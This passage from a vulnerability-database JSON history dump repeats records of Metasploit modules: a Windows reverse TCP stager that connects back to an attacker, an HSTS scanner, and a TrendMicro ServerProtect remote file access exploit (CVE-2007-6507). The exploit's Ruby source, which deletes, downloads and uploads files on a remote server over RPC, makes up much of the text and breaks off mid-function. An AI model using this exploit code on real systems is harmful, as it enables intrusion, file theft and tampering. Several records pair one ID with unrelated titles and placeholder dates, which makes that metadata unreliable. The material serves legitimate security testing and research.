"metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. 
Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-23T16:15:00", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.8, "vector": "NONE", "modified": "2019-09-23T16:15:00"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:47407", "EDB-ID:47408", "EDB-ID:47401"]}, {"type": "kitploit", "idList": ["KITPLOIT:1828759017764294422", "KITPLOIT:8450240194909548501"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190921-01-DEBUG"]}, {"type": "cve", "idList": ["CVE-2019-6145"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:88B3739C40911AEE494A457ECD8EB065"]}, {"type": "threatpost", "idList": ["THREATPOST:067710C6659ABBDC4D0EF1D55FBAA4D4", "THREATPOST:91C8490D648FB4F23E83E6D699AA09E9"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:69C9337EACF910EA5FA86B5EA064E7E0"]}, {"type": "talosblog", "idList": ["TALOSBLOG:25506C78BB084870681BE9F9E1357045", "TALOSBLOG:447DDD14CB51AB5B358C002E9398C9F5"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:30E6F331B0933D74F30CE6FBDFB8F0BA"]}, {"type": "thn", "idList": ["THN:7F6095CDC4316E31C321DF2BCD6B3AB3"]}, {"type": "ics", "idList": ["ICSA-19-262-01"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154547"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815473", "OPENVAS:1361412562310876810", "OPENVAS:1361412562310876814"]}], "modified": "2019-09-23T16:15:00"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 
'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-23T16:15:00", "differentElements": ["modified", "published"], "edition": 31}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "782981c5f3ef7ed2032227c6b3eba8ad", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. 
Connect back to the attacker\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-07T12:01:37", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.2, "vector": "NONE", "modified": "2019-10-07T12:01:37"}, "dependencies": {"references": [{"type": "pentestlab", "idList": ["PENTESTLAB:4D7ADE73C6CAD943F1DDC37596BA1E4B"]}, {"type": "exploitdb", "idList": ["EDB-ID:47467", "EDB-ID:47468", "EDB-ID:47470", "EDB-ID:47471"]}, {"type": "jakearchibald", "idList": ["JAKEARCHIBALD:AE099BFD5E48A6EC3AAB5E2D141B3F6D"]}, {"type": "kitploit", "idList": ["KITPLOIT:7944621450687180670", "KITPLOIT:1929283733434729640"]}, {"type": "cve", "idList": ["CVE-2019-17199", "CVE-2019-17180", "CVE-2019-15162"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154738", "PACKETSTORM:154735", "PACKETSTORM:154736", "PACKETSTORM:154737"]}, {"type": "hackread", "idList": ["HACKREAD:5A404B45E6DC5DB911C89C0F6D2D235D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"]}, {"type": "mskb", "idList": ["KB4516065", "KB4516033"]}, {"type": "mssecure", "idList": ["MSSECURE:8DF3393BE9822660F1B18B7D7DCD3AC4"]}], "modified": "2019-10-07T12:01:37"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n 
super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-07T12:01:37", "differentElements": ["modified", "published"], "edition": 32}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-07T15:19:01", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.2, "vector": "NONE", "modified": "2019-10-07T15:19:01"}, "dependencies": {"references": [{"type": "pentestlab", "idList": ["PENTESTLAB:4D7ADE73C6CAD943F1DDC37596BA1E4B"]}, {"type": "exploitdb", "idList": ["EDB-ID:47467", "EDB-ID:47468", "EDB-ID:47471", "EDB-ID:47470"]}, {"type": "jakearchibald", "idList": ["JAKEARCHIBALD:AE099BFD5E48A6EC3AAB5E2D141B3F6D"]}, {"type": "kitploit", "idList": ["KITPLOIT:7944621450687180670", "KITPLOIT:1929283733434729640"]}, {"type": "cve", "idList": ["CVE-2019-17199", "CVE-2019-17180", "CVE-2019-15162"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154738", "PACKETSTORM:154735", "PACKETSTORM:154736", "PACKETSTORM:154737"]}, {"type": "hackread", "idList": ["HACKREAD:5A404B45E6DC5DB911C89C0F6D2D235D"]}, {"type": "talosblog", "idList": 
["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"]}, {"type": "mskb", "idList": ["KB4516065", "KB4516033"]}, {"type": "mssecure", "idList": ["MSSECURE:8DF3393BE9822660F1B18B7D7DCD3AC4"]}], "modified": "2019-10-07T15:19:01"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-07T15:19:01", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 33}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "61a5bcd44b19f458296abf70a18b7b71", "type": "metasploit", "bulletinFamily": "exploit", "title": "HTTP Strict Transport Security (HSTS) Detection", "description": "Display HTTP Strict Transport Security (HSTS) information about each system.\n", "published": "2012-11-30T14:30:11", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], 
"cvelist": [], "lastseen": "2019-10-15T22:02:15", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.2, "vector": "NONE", "modified": "2019-10-07T15:19:01"}, "dependencies": {"references": [{"type": "pentestlab", "idList": ["PENTESTLAB:4D7ADE73C6CAD943F1DDC37596BA1E4B"]}, {"type": "exploitdb", "idList": ["EDB-ID:47467", "EDB-ID:47468", "EDB-ID:47471", "EDB-ID:47470"]}, {"type": "jakearchibald", "idList": ["JAKEARCHIBALD:AE099BFD5E48A6EC3AAB5E2D141B3F6D"]}, {"type": "kitploit", "idList": ["KITPLOIT:7944621450687180670", "KITPLOIT:1929283733434729640"]}, {"type": "cve", "idList": ["CVE-2019-17199", "CVE-2019-17180", "CVE-2019-15162"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154738", "PACKETSTORM:154735", "PACKETSTORM:154736", "PACKETSTORM:154737"]}, {"type": "hackread", "idList": ["HACKREAD:5A404B45E6DC5DB911C89C0F6D2D235D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"]}, {"type": "mskb", "idList": ["KB4516065", "KB4516033"]}, {"type": "mssecure", "idList": ["MSSECURE:8DF3393BE9822660F1B18B7D7DCD3AC4"]}], "modified": "2019-10-07T15:19:01"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/http_hsts.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'HTTP Strict Transport Security (HSTS) Detection',\n 'Description' => %q{\n Display HTTP Strict Transport Security (HSTS) information about each system.\n },\n 'Author' => 'Matt \"hostess\" Andreko <mandreko[at]accuvant.com>',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n ))\n\n register_options([\n Opt::RPORT(443)\n ])\n end\n\n def run_host(ip)\n begin\n res = 
send_request_cgi({\n 'uri' => '/',\n 'method' => 'GET',\n }, 25)\n\n if res\n hsts = res.headers['Strict-Transport-Security']\n\n if hsts\n print_good(\"#{ip}:#{rport} - Strict-Transport-Security:#{hsts}\")\n report_note({\n :data => hsts,\n :type => \"hsts.data\",\n :host => ip,\n :port => rport\n })\n else\n print_error(\"#{ip}:#{rport} No HSTS found.\")\n end\n else\n print_error(\"#{ip}:#{rport} No headers were returned.\")\n end\n\n rescue ::Timeout::Error, ::Errno::EPIPE\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-15T22:02:15", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 34}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. 
Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-16T00:32:21", "history": [], "viewCount": 12, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2019-10-16T00:32:21"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:8EB884B880A80E689744A516A7A41E38", "THREATPOST:1A63205DD8F6EE3AD36956AA8B2624E5"]}, {"type": "kitploit", "idList": ["KITPLOIT:6910250162001955125", "KITPLOIT:5655524805475386986", "KITPLOIT:2505267191039065451", "KITPLOIT:7691462746351557369"]}, {"type": "mskb", "idList": ["KB4511553", "KB4507435", "KB4503286", "KB4516033", "KB4516044", "KB4512578", "KB4516058"]}, {"type": "thn", "idList": ["THN:CBF6006B338B7F10D2111698075C0C39"]}, {"type": "paloalto", "idList": ["PAN-SA-2019-0036"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154851"]}, {"type": "exploitdb", "idList": ["EDB-ID:47503"]}, {"type": "symantec", "idList": ["SMNTC-110420", "SMNTC-110417"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:9E4EC6469D99F0778B70025C8760BFDE"]}], "modified": "2019-10-16T00:32:21"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, 
Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-16T00:32:21", "differentElements": ["modified", "published"], "edition": 35}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "782981c5f3ef7ed2032227c6b3eba8ad", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-21T19:25:26", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2019-11-21T19:25:26"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:597800CEAF4F4832B357C491661792B5", "THREATPOST:E00DA222DAC876747F9911778DDC997F", "THREATPOST:B9A717DA93642284A9408C7A11D5714E"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A945F3BF130B3EBF81C9BAB217460EB7"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:06ED86BC5FE8565621F6AE9C50A76CB4"]}, {"type": "kitploit", "idList": ["KITPLOIT:7044561031766565764", "KITPLOIT:137665143701353068"]}, {"type": "exploitdb", "idList": ["EDB-ID:47702", "EDB-ID:47704", "EDB-ID:47698"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155428", "PACKETSTORM:155422"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:92BAA97414824FCFD7415368441F952B"]}, {"type": "cisco", "idList": ["CISCO-SA-20191120-WEBEX-TEAMS-DLL"]}, {"type": 
"carbonblack", "idList": ["CARBONBLACK:5085413858A32D1D784A1CBD8DF765D8"]}, {"type": "securelist", "idList": ["SECURELIST:A2AE2595A5AE466397487EF9A96F6652"]}, {"type": "thn", "idList": ["THN:807F9F40C7FDF88824233F1436974D0E"]}, {"type": "mskb", "idList": ["KB921896"]}, {"type": "nessus", "idList": ["ITUNES_12_10_2.NASL"]}, {"type": "symantec", "idList": ["SMNTC-110927"]}], "modified": "2019-11-21T19:25:26"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-21T19:25:26", "differentElements": ["modified", "published"], "edition": 36}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. 
Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-21T21:22:39", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2019-11-21T21:22:39"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:597800CEAF4F4832B357C491661792B5", "THREATPOST:E00DA222DAC876747F9911778DDC997F", "THREATPOST:B9A717DA93642284A9408C7A11D5714E"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A945F3BF130B3EBF81C9BAB217460EB7"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:06ED86BC5FE8565621F6AE9C50A76CB4"]}, {"type": "kitploit", "idList": ["KITPLOIT:7044561031766565764", "KITPLOIT:137665143701353068"]}, {"type": "exploitdb", "idList": ["EDB-ID:47702", "EDB-ID:47704", "EDB-ID:47698"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155428", "PACKETSTORM:155422"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:92BAA97414824FCFD7415368441F952B"]}, {"type": "cisco", "idList": ["CISCO-SA-20191120-WEBEX-TEAMS-DLL"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:5085413858A32D1D784A1CBD8DF765D8"]}, {"type": "securelist", "idList": ["SECURELIST:A2AE2595A5AE466397487EF9A96F6652"]}, {"type": "thn", "idList": ["THN:807F9F40C7FDF88824233F1436974D0E"]}, {"type": "mskb", "idList": ["KB921896"]}, {"type": "nessus", "idList": ["ITUNES_12_10_2.NASL"]}, {"type": "symantec", "idList": ["SMNTC-110927"]}], "modified": "2019-11-21T21:22:39"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 
'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-21T21:22:39", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 37}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "20a65010c3738dd1e9919f418cdd0b30", "type": "metasploit", "bulletinFamily": "exploit", "title": "TrendMicro ServerProtect File Access", "description": "This modules exploits a remote file access flaw in the ServerProtect Windows Server RPC service. 
Please see the action list (or the help output) for more information.\n", "published": "2008-01-28T03:06:31", "modified": "2017-07-24T13:26:21", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6507"], "cvelist": ["CVE-2007-6507"], "lastseen": "2019-11-22T05:30:29", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2019-11-22T05:30:29"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-6507"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SERVERPROTECT/FILE"]}, {"type": "zdi", "idList": ["ZDI-07-077"]}], "modified": "2019-11-22T05:30:29"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/serverprotect/file.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::DCERPC\n include Msf::Post::Windows::Registry\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'TrendMicro ServerProtect File Access',\n 'Description' => %q{\n This modules exploits a remote file access flaw in the ServerProtect Windows\n Server RPC service. 
Please see the action list (or the help output) for more\n information.\n },\n 'DefaultOptions' =>\n {\n 'DCERPC::ReadTimeout' => 300 # Long-running RPC calls\n },\n 'Author' => [ 'toto' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2007-6507' ],\n [ 'OSVDB', '44318' ],\n [ 'ZDI', '07-077'],\n ],\n 'Actions' =>\n [\n [ 'delete' ],\n [ 'download' ],\n [ 'upload' ],\n [ 'list' ]\n ]\n ))\n\n register_options(\n [\n Opt::RPORT(5168),\n OptString.new('RPATH',\n [\n false,\n \"The remote filesystem path\",\n nil\n ]),\n OptString.new('LPATH',\n [\n false,\n \"The local filesystem path\",\n nil\n ]),\n ])\n end\n\n def check_option(name)\n if(not datastore[name])\n raise RuntimeError, \"The #{name} parameter is required by this option\"\n end\n end\n\n def auxiliary_commands\n {\n \"delete\" => \"Delete a file\",\n \"download\" => \"Download a file\",\n \"upload\" => \"Upload a file\",\n \"list\" => \"List files (not recommended - will crash the driver)\",\n }\n end\n\n def run\n case action.name\n when 'download'\n check_option('RPATH')\n check_option('LPATH')\n cmd_download(datastore['RPATH'], datastore['LPATH'])\n when 'upload'\n check_option('RPATH')\n check_option('LPATH')\n cmd_upload(datastore['RPATH'], datastore['LPATH'])\n when 'delete'\n check_option('RPATH')\n cmd_delete(datastore['RPATH'])\n when 'list'\n check_option('RPATH')\n cmd_list(datastore['RPATH'])\n else\n print_error(\"Unknown action #{action.name}\")\n end\n end\n\n def deunicode(str)\n str.gsub(/\\x00/, '').strip\n end\n\n #\n # Once this function is used, if cmd_download or cmd_upload is called the server will crash :/\n #\n def cmd_list(*args)\n\n if (args.length < 1)\n print_status(\"Usage: list folder\")\n return\n end\n\n file = Rex::Text.to_unicode(args[0])\n\n data = \"\\0\" * 0x100\n data[4, file.length] = file\n\n # FindFirstFile\n resp = serverprotect_rpccmd(131080, data, 0x100)\n return if not resp\n\n if resp.length != 0x108\n print_error(\"An unknown error occurred 
while calling FindFirstFile.\")\n return\n end\n\n\n ret, = resp[0x104,4].unpack('V')\n if ret != 0\n print_error(\"An error occurred while calling FindFirstFile #{args[0]}: #{ret}.\")\n return\n end\n\n handle, = resp[4,4].unpack('V')\n\n file = deunicode(resp[0x30, 0xd0])\n print(\"#{file}\\n\")\n\n data = \"\\0\" * 0x100\n data[0,4] = [handle].pack('V')\n\n while true\n # FindNextFile\n resp = serverprotect_rpccmd(131081, data, 0x100)\n return if not resp\n\n if resp.length != 0x108\n print_error(\"An unknown error occurred while calling FindFirstFile.\")\n break\n end\n\n ret, = resp[0x104,4].unpack('V')\n if ret != 0\n break\n end\n\n file = deunicode(resp[0x30, 0xd0])\n print(\"#{file}\\n\")\n end\n\n data = \"\\0\" * 0x100\n data = [handle].pack('V')\n # FindClose\n resp = serverprotect_rpccmd(131082, data, 0x100)\n end\n\n\n def cmd_delete(*args)\n\n if (args.length == 0)\n print_status(\"Usage: delete c:\\\\windows\\\\system.ini\")\n return\n end\n\n data = Rex::Text.to_unicode(args[0]+\"\\0\")\n resp = serverprotect_rpccmd(131077, data, 4)\n return if not resp\n\n if (resp.length == 12)\n ret, = resp[8,4].unpack('V')\n\n if ret == 0\n print_good(\"File #{args[0]} successfully deleted.\")\n else\n print_error(\"An error occurred while deleting #{args[0]}: #{ret}.\")\n end\n end\n\n end\n\n\n def cmd_download(*args)\n\n if (args.length < 2)\n print_status(\"Usage: download remote_file local_file\")\n return\n end\n\n # GENERIC_READ: 0x80000000\n # FILE_SHARE_READ: 1\n # OPEN_EXISTING: 3\n # FILE_ATTRIBUTE_NORMAL: 0x80\n handle = serverprotect_createfile(args[0], 0x80000000, 1, 3, 0x80)\n if (not handle or handle == 0)\n return\n end\n\n fd = File.new(args[1], \"wb\")\n\n print_status(\"Downloading #{args[0]}...\")\n\n # reads 0x1000 bytes (hardcoded in the soft)\n while ((data = serverprotect_readfile(handle)).length > 0)\n fd.write(data)\n end\n\n fd.close\n\n serverprotect_closehandle(handle)\n\n print_good(\"File #{args[0]} successfully downloaded.\")\n 
end\n\n\n def cmd_upload(*args)\n\n if (args.length < 2)\n print_status(\"Usage: upload local_file remote_file\")\n return\n end\n\n # GENERIC_WRITE: 0x40000000\n # FILE_SHARE_WRITE: 2\n # CREATE_ALWAYS: 2\n # FILE_ATTRIBUTE_NORMAL: 0x80\n handle = serverprotect_createfile(args[1], 0x40000000, 2, 2, 0x80)\n if (handle == 0)\n return\n end\n\n fd = File.new(args[0], \"rb\")\n\n print_status(\"Uploading #{args[1]}...\")\n\n # write 0x1000 bytes (hardcoded in the soft)\n while ((data = fd.read(0x1000)) != nil)\n serverprotect_writefile(handle, data)\n end\n\n fd.close\n\n serverprotect_closehandle(handle)\n\n print_good(\"File #{args[1]} successfully uploaded.\")\n end\n\n\n def serverprotect_createfile(file, desiredaccess, sharemode, creationdisposition, flags)\n data = \"\\0\" * 540\n file = Rex::Text.to_unicode(file)\n data[4, file.length] = file\n data[524, 16] = [desiredaccess, sharemode, creationdisposition, flags].pack('VVVV')\n\n resp = serverprotect_rpccmd(131073, data, 540)\n return if not resp\n\n if (resp.length < 548)\n print_error(\"An unknown error occurred while calling CreateFile.\")\n return 0\n else\n handle, = resp[4,4].unpack('V')\n ret, = resp[544,4].unpack('V')\n\n if ret != 0\n print_error(\"An error occurred while calling CreateFile: #{ret}.\")\n return 0\n else\n return handle\n end\n end\n end\n\n\n def 